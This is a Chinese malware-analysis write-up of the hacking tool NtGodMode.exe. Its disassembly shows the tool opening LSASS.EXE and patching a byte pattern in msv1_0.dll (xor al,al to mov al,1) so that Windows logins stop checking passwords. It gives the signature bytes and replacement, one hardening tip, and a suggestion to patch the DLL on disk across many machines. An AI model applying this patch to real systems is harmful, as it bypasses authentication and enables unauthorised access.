分析NtGodMode.exe干了什么
分析NtGodMode.exe干了什么
发布时间:2016-12-26 来源:查字典编辑
摘要:byhttp://tmdnet.nothave.comNtGodModex.exehttp://www.xfocus.net/tools/2...

byhttp://tmdnet.nothave.com

NtGodModex.exehttp://www.xfocus.net/tools/200804/1272.html

NtGodMode.exe9.00KB(9,216字节)UPX壳,直接用Ollydbg脱壳,过程略

NtGodMode~.exe120KB(123,392字节)用PE工具查看,delphi写的

00403220>55PUSHEBP

004032218BECMOVEBP,ESP

00403223B90D000000MOVECX,0D

004032286A00PUSH0

0040322A6A00PUSH0

0040322C49DECECX

0040322D^75F9JNZSHORTNtGodMod.00403228

0040322F51PUSHECX

0040323053PUSHEBX

0040323156PUSHESI

0040323257PUSHEDI

00403233A19C404000MOVEAX,DWORDPTRDS:[40409C]

00403238C60001MOVBYTEPTRDS:[EAX],1

0040323BB8C0314000MOVEAX,NtGodMod.004031C0

00403240E813EEFFFFCALLNtGodMod.00402058//获取自身进程的句柄(基地址)

00403245BB60574000MOVEBX,NtGodMod.00405760

0040324A33C0XOREAX,EAX

0040324C55PUSHEBP

0040324D6880384000PUSHNtGodMod.00403880

0040325264:FF30PUSHDWORDPTRFS:[EAX]

0040325564:8920MOVDWORDPTRFS:[EAX],ESP

00403258E81BF2FFFFCALLNtGodMod.00402478

0040325D48DECEAX

0040325E7D61JGESHORTNtGodMod.004032C1//->>004032C1

00403260E84FFEFFFFCALLNtGodMod.004030B4

004032656898384000PUSHNtGodMod.00403898;ASCII"Usage:"

0040326A8D55E4LEAEDX,DWORDPTRSS:[EBP-1C]

0040326D33C0XOREAX,EAX

0040326FE8F8F0FFFFCALLNtGodMod.0040236C

004032748B45E4MOVEAX,DWORDPTRSS:[EBP-1C]

004032778D55E8LEAEDX,DWORDPTRSS:[EBP-18]

0040327AE811F4FFFFCALLNtGodMod.00402690

0040327FFF75E8PUSHDWORDPTRSS:[EBP-18]

0040328268A8384000PUSHNtGodMod.004038A8;ASCII"ON|OFF"

004032878D45ECLEAEAX,DWORDPTRSS:[EBP-14]

0040328ABA03000000MOVEDX,3

0040328FE870E9FFFFCALLNtGodMod.00401C04

///////////////////////////////////////////////////////////////////////////////////////////////////

004032C1A18C404000MOVEAX,DWORDPTRDS:[40408C]

004032C6E861EAFFFFCALLNtGodMod.00401D2C

004032CB50PUSHEAX//msv1_0.dll

004032CCE8BFEEFFFFCALL<JMP.&kernel32.LoadLibraryA>//LoadLibrary("msv1_0.dll")

004032D1A34C574000MOVDWORDPTRDS:[40574C],EAX//保存msv1_0.dll基地址

004032D6833D4C5740000>CMPDWORDPTRDS:[40574C],0

004032DD0F8482050000JENtGodMod.00403865

004032E333C0XOREAX,EAX

004032E5A350574000MOVDWORDPTRDS:[405750],EAX

004032EAA14C574000MOVEAX,DWORDPTRDS:[40574C]

004032EF8903MOVDWORDPTRDS:[EBX],EAX

004032F133C0XOREAX,EAX

004032F355PUSHEBP

004032F46850334000PUSHNtGodMod.00403350

004032F964:FF30PUSHDWORDPTRFS:[EAX]

004032FC64:8920MOVDWORDPTRFS:[EAX],ESP

004032FF8B03MOVEAX,DWORDPTRDS:[EBX]//msv1_0.dll基地址

0040330180388BCMPBYTEPTRDS:[EAX],8B

00403304751CJNZSHORTNtGodMod.00403322

004033068B03MOVEAX,DWORDPTRDS:[EBX]

0040330840INCEAX

0040330980384DCMPBYTEPTRDS:[EAX],4D

0040330C7514JNZSHORTNtGodMod.00403322

0040330E8B03MOVEAX,DWORDPTRDS:[EBX]

0040331083C002ADDEAX,2

0040331380380CCMPBYTEPTRDS:[EAX],0C

00403316750AJNZSHORTNtGodMod.00403322

004033188B03MOVEAX,DWORDPTRDS:[EBX]

0040331A83C003ADDEAX,3

0040331D803849CMPBYTEPTRDS:[EAX],49//在msv1_0.dll空间里找8B4D0C49,这个特征值

004033207404JESHORTNtGodMod.00403326//如果找到则继续在后面的空间里找32C0

00403322FF03INCDWORDPTRDS:[EBX]

00403324^EBD9JMPSHORTNtGodMod.004032FF

004033268B03MOVEAX,DWORDPTRDS:[EBX]

00403328803832CMPBYTEPTRDS:[EAX],32

0040332B7511JNZSHORTNtGodMod.0040333E

0040332D8B03MOVEAX,DWORDPTRDS:[EBX]

0040332F40INCEAX

004033308038C0CMPBYTEPTRDS:[EAX],0C0

004033337509JNZSHORTNtGodMod.0040333E

004033358B03MOVEAX,DWORDPTRDS:[EBX]

00403337A350574000MOVDWORDPTRDS:[405750],EAX//保存找的地址[405750]

0040333CEB04JMPSHORTNtGodMod.00403342

0040333EFF03INCDWORDPTRDS:[EBX]//指针加1

00403340^EBE4JMPSHORTNtGodMod.00403326

0040334233C0XOREAX,EAX

004033445APOPEDX

0040334559POPECX

0040334659POPECX

0040334764:8910MOVDWORDPTRFS:[EAX],EDX

0040334A6857334000PUSHNtGodMod.00403357

0040334FC3RETN

00403357A150574000MOVEAX,DWORDPTRDS:[405750]

0040335C2B054C574000SUBEAX,DWORDPTRDS:[40574C]//上面找到的地址=msv1_0.dll基地址,得到特征值的偏移

00403362A350574000MOVDWORDPTRDS:[405750],EAX//offset->[405750]

00403367A14C574000MOVEAX,DWORDPTRDS:[40574C]

0040336C50PUSHEAX

0040336DE8E6EDFFFFCALL<JMP.&kernel32.FreeLibrary>

00403372C6059C5840000>MOVBYTEPTRDS:[40589C],0

00403379C605915840000>MOVBYTEPTRDS:[405891],0

00403380C6059D5840000>MOVBYTEPTRDS:[40589D],0

00403387E828FDFFFFCALLNtGodMod.004030B4//显示作者信息

0040338C8D55DCLEAEDX,DWORDPTRSS:[EBP-24]

0040338FB802000000MOVEAX,2

00403394E8D3EFFFFFCALLNtGodMod.0040236C

.

.

.

/////////////////////////////////////////////////////////////////////////////////////////////

//提升自身权限为调试权限

http://tmdnet.nothave.com/tmp/NtGodMode.txt

00402F1C53PUSHEBX;NtGodMod.00405760

00402F1D83C4E8ADDESP,-18

00402F2033DBXOREBX,EBX

00402F2254PUSHESP

00402F236A28PUSH28

00402F25E83EF2FFFFCALL<JMP.&kernel32.GetCurrentProcess>

00402F2A50PUSHEAX

00402F2BE8F8F1FFFFCALL<JMP.&advapi32.OpenProcessToken>

00402F308D44240CLEAEAX,DWORDPTRSS:[ESP+C]

00402F3450PUSHEAX

00402F35687C2F4000PUSHNtGodMod.00402F7C;ASCII"SeDebugPrivilege"

00402F3A6A00PUSH0

00402F3CE8DFF1FFFFCALL<JMP.&advapi32.LookupPrivilegeValueA>

00402F4185C0TESTEAX,EAX

00402F437430JESHORTNtGodMod.00402F75

00402F45C744240801000>MOVDWORDPTRSS:[ESP+8],1

00402F4DC744241402000>MOVDWORDPTRSS:[ESP+14],2

00402F558D442404LEAEAX,DWORDPTRSS:[ESP+4]

00402F5950PUSHEAX

00402F5A6A00PUSH0

00402F5C6A10PUSH10

00402F5E8D442414LEAEAX,DWORDPTRSS:[ESP+14]

00402F6250PUSHEAX

00402F636A00PUSH0

00402F658B442414MOVEAX,DWORDPTRSS:[ESP+14]

00402F6950PUSHEAX

00402F6AE8A9F1FFFFCALL<JMP.&advapi32.AdjustTokenPrivileges>

00402F6F83F801CMPEAX,1

00402F721BDBSBBEBX,EBX

00402F7443INCEBX

00402F758BC3MOVEAX,EBX

00402F7783C418ADDESP,18

00402F7A5BPOPEBX

00402F7BC3RETN

///////////////////////////////////////////////////////////////////////////////////////////////

.

.//这段为通过进程名获取PID(LSASS.EXE)太长略...

.

///////////////////////////////////////////////////////////////////////////////////////////////

http://tmdnet.nothave.com/tmp/NtGodMode.txt

0040358A50PUSHEAX

0040358B6A00PUSH0

0040358D68FF0F1F00PUSH1F0FFF

00403592E801ECFFFFCALL<JMP.&kernel32.OpenProcess>//打开%systemroot%system32LSASS.EXE进程

004035978BF0MOVESI,EAX

0040359985F6TESTESI,ESI

0040359B751EJNZSHORTNtGodMod.004035BB

0040359DA198404000MOVEAX,DWORDPTRDS:[404098]

004035A2BA10394000MOVEDX,NtGodMod.00403910;ASCII"Sorry.Ican'tDOmore."

004035A7E878E8FFFFCALLNtGodMod.00401E24

004035ACE86FE1FFFFCALLNtGodMod.00401720

004035B1E83EDCFFFFCALLNtGodMod.004011F4

004035B6E9AA020000JMPNtGodMod.00403865

004035BBB8A0584000MOVEAX,NtGodMod.004058A0

004035C0BA00000100MOVEDX,10000

004035C5E80EECFFFFCALLNtGodMod.004021D8

004035CA68A0584100PUSHNtGodMod.004158A0

004035CFBAA0584000MOVEDX,NtGodMod.004058A0

004035D4B900000100MOVECX,10000

004035D98BC6MOVEAX,ESI

004035DBE8A4F8FFFFCALLNtGodMod.00402E84

004035E08B3DA0584100MOVEDI,DWORDPTRDS:[4158A0]

004035E64FDECEDI

004035E785FFTESTEDI,EDI

004035E90F82D6000000JBNtGodMod.004036C5

004035EF47INCEDI

004035F0C705585740000>MOVDWORDPTRDS:[405758],0

004035FABBA0584000MOVEBX,NtGodMod.004058A0

004035FF833B00CMPDWORDPTRDS:[EBX],0

004036020F84BD000000JENtGodMod.004036C5

00403608C705A4584100C>MOVDWORDPTRDS:[4158A4],0C8

00403612A1A4584100MOVEAX,DWORDPTRDS:[4158A4]

0040361750PUSHEAX

00403618B9A8584100MOVECX,NtGodMod.004158A8

0040361D8B13MOVEDX,DWORDPTRDS:[EBX]

0040361F8BC6MOVEAX,ESI

00403621E88EF8FFFFCALLNtGodMod.00402EB4

///////////////////////////////////////////////////////////////////////////////////////////////////

http://tmdnet.nothave.com/tmp/NtGodMode.txt

00403732685C574000PUSHNtGodMod.0040575C

004037376A40PUSH40

004037396A02PUSH2

0040373BA150574000MOVEAX,DWORDPTRDS:[405750]

0040374050PUSHEAX

0040374156PUSHESI

00403742E879EAFFFFCALL<JMP.&kernel32.VirtualProtectEx>

004037476898584000PUSHNtGodMod.00405898

0040374C6A02PUSH2

0040374E6890404000PUSHNtGodMod.00404090

00403753A150574000MOVEAX,DWORDPTRDS:[405750]

0040375850PUSHEAX

0040375956PUSHESI

0040375AE869EAFFFFCALL<JMP.&kernel32.WriteProcessMemory>//32C0xoral,al修改为B001moval,1

0040375FB004MOVAL,4

00403761E8DEEFFFFFCALLNtGodMod.00402744

00403766A198404000MOVEAX,DWORDPTRDS:[404098]

0040376BBA70394000MOVEDX,NtGodMod.00403970;ASCII"OpenGodMode!"

00403770E8AFE6FFFFCALLNtGodMod.00401E24

00403775E8A6DFFFFFCALLNtGodMod.00401720

0040377AE875DAFFFFCALLNtGodMod.004011F4

0040377F33C0XOREAX,EAX

00403781E8BEEFFFFFCALLNtGodMod.00402744

00403786EB54JMPSHORTNtGodMod.004037DC

00403788685C574000PUSHNtGodMod.0040575C

0040378D6A40PUSH40

0040378F6A02PUSH2

00403791A150574000MOVEAX,DWORDPTRDS:[405750]

0040379650PUSHEAX

0040379756PUSHESI

00403798E823EAFFFFCALL<JMP.&kernel32.VirtualProtectEx>

0040379D6898584000PUSHNtGodMod.00405898

004037A26A02PUSH2

004037A46894404000PUSHNtGodMod.00404094

004037A9A150574000MOVEAX,DWORDPTRDS:[405750]

004037AE50PUSHEAX

004037AF56PUSHESI

004037B0E813EAFFFFCALL<JMP.&kernel32.WriteProcessMemory>

004037B5B007MOVAL,7

004037B7E888EFFFFFCALLNtGodMod.00402744

004037BCA198404000MOVEAX,DWORDPTRDS:[404098]

004037C1BA88394000MOVEDX,NtGodMod.00403988;ASCII"CloseGodMode!"

004037C6E859E6FFFFCALLNtGodMod.00401E24

004037CBE850DFFFFFCALLNtGodMod.00401720

004037D0E81FDAFFFFCALLNtGodMod.004011F4

004037D533C0XOREAX,EAX

004037D7E868EFFFFFCALLNtGodMod.00402744

004037DC6A00PUSH0

004037DE6A00PUSH0

004037E056PUSHESI

004037E1E86AE9FFFFCALL<JMP.&kernel32.FlushInstructionCache>

小结

NtGodMode.exe是通过打开LSASS.EXE进程msv1_0.dll模块空间里,然后搜索特征值8B4D0C49之后第1个32C0

这个32C0汇编码xoral,al,修改为B001对应汇编码moval,1

为什么moval,1,以后就不用密码了?有兴趣的同学可以装个虚拟机,调下LSASS.EXE

这个程序在我自己的机器win2ksp4上,不起作用,我跟了一下,主要是搜索的上面的哪个特征值它不是通用的,修改错了地方

xpsp2xpsp3都起作用。

另外想让自己机器免疫这个东西的话,其实也很简单控制面板->管理工具->本地安全策略->本地策略->用户权利指派->调试程序

里面有个admin用户,删除了以后,因为这个程序提升自身权限的代码,很老,很差,很弱小,会失效

其实这个东西要这样用,通过编程的方法,关掉系统的文件保护,直接改msv1_0.dll这个PE文件,这样机器不用密码了,然后要是很多机器的话访问共享文件也方便,计算机应该以人为本。

最后说一句delphi写的东西是不行,垃圾太多~!!

http://tmdnet.nothave.com/tmp/NtGodMode.txt

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新漏洞研究学习
热门漏洞研究学习
实用技巧子分类